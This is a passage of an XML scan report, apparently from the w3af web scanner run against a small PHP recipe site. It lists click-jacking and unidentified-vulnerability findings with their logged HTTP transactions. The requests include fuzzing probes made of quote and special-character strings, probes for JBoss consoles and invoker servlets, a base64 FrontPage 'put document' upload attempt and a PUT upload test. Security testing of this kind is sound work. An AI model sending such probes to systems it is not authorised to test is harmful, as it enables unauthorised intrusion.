        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="285">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/g70HkPDQ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="285">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about g70HkPDQ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='g70HkPDQ'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="312">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="312">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[238, 285, 363]" name="Unidentified vulnerability" plugin="generic" url="http://10.12.68.25:31337/">
        <description>An unidentified vulnerability was found at: &quot;http://10.12.68.25:31337/&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;&quot;. This vulnerability was found in the requests with ids 238, 285 and 363.</description>
        <http-transactions>
            <http-transaction id="238">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="238">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="285">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/g70HkPDQ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="285">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about g70HkPDQ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='g70HkPDQ'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="363">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="363">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </information>
    <information id="[16, 105, 106, 113, 132, 139, 174, 199, 203, 204, 206, 207, 208, 209, 213, 214, 215, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 230, 231, 232, 233, 234, 235, 236, 237, 239, 240, 241, 242, 243, 244, 245, 246, 247, 249, 250, 251, 252, 253, 255, 256, 257, 259, 262, 265, 266, 267, 268, 269, 270, 271, 273, 274, 275, 276, 277, 278, 279, 285, 287, 309, 311, 312, 314, 315, 318, 324, 326, 327, 328, 329, 330, 331, 332, 333, 336, 337, 338, 339, 340, 341, 342, 344, 345, 346, 347, 349, 350, 351, 352, 353, 354, 356, 358, 359, 360, 361, 362, 364, 365, 366, 368, 371, 374, 375, 376, 383, 388, 389, 392, 395, 404, 418, 427, 435, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 450, 451, 452, 454, 455, 456, 457, 459, 461, 462, 463, 464, 467, 469, 470, 471, 472, 474, 491, 505, 513, 515, 518, 527, 531, 533, 535, 538, 540, 541, 542, 543, 546, 548, 554, 567, 577, 583, 604, 613, 645, 660, 664, 670, 686, 690, 696, 703, 704, 705, 720, 726, 730, 731, 732, 738, 749, 751, 753, 754, 759, 764, 771, 772, 773, 777, 787, 788, 803, 804, 819, 820, 835, 836, 851, 852, 864]" name="Click-Jacking vulnerability" plugin="click_jacking" url="None">
        <description>The whole target has no protection (X-Frame-Options header) against Click-Jacking attacks. This vulnerability was found in the requests with ids 16, 105 to 106, 113, 132, 139, 174, 199, 203 to 204, 206 to 209, 213 to 215, 217 to 228, 230 to 237, 239 to 247, 249 to 253, 255 to 257, 259, 262, 265 to 271, 273 to 279, 285, 287, 309, 311 to 312, 314 to 315, 318, 324, 326 to 333, 336 to 342, 344 to 347, 349 to 354, 356, 358 to 362, 364 to 366, 368, 371, 374 to 376, 383, 388 to 389, 392, 395, 404, 418, 427, 435, 438 to 448, 450 to 452, 454 to 457, 459, 461 to 464, 467, 469 to 472, 474, 491, 505, 513, 515, 518, 527, 531, 533, 535, 538, 540 to 543, 546, 548, 554, 567, 577, 583, 604, 613, 645, 660, 664, 670, 686, 690, 696, 703 to 705, 720, 726, 730 to 732, 738, 749, 751, 753 to 754, 759, 764, 771 to 773, 777, 787 to 788, 803 to 804, 819 to 820, 835 to 836, 851 to 852 and 864.</description>
        <http-transactions>
            <http-transaction id="16">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="16">
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h1&gt;List of recipes&lt;/h1&gt;

    &lt;ul&gt;
        &lt;li&gt;&lt;a href=&quot;/choucroute&quot;&gt;Choucroute garnie&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;&lt;a href=&quot;/cake&quot;&gt;Chocolate cake&lt;/a&gt;&lt;/li&gt;
        ... And more to come!
    &lt;/ul&gt;
    &lt;a href='/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="105">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="105">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="106">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="106">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="113">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/fpujZ.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="113">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fpujZ.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="132">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="132">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about server-status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='server-status'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="139">
                <httprequest>
                    <status>POST http://10.12.68.25:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L2ZwdWpaLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGguWmp1cGY=
</body>
                </httprequest>
                <httpresponse id="139">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="174">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="174">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="199">
                <httprequest>
                    <status>PUT http://10.12.68.25:31337/ZjIst HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">uFwQSK</body>
                </httprequest>
                <httpresponse id="199">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ZjIst has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ZjIst'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="203">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="203">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about admin-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='admin-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="204">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="204">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about jmx-console/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='jmx-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="206">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="206">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='status'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="207">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="207">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about WebConsole/Invoker has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='WebConsole/Invoker'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="208">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="208">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about invoker/JMXInvokerServlet has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='invoker/JMXInvokerServlet'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="209">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="209">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="213">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="213">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="214">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="214">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="215">
                <httprequest>
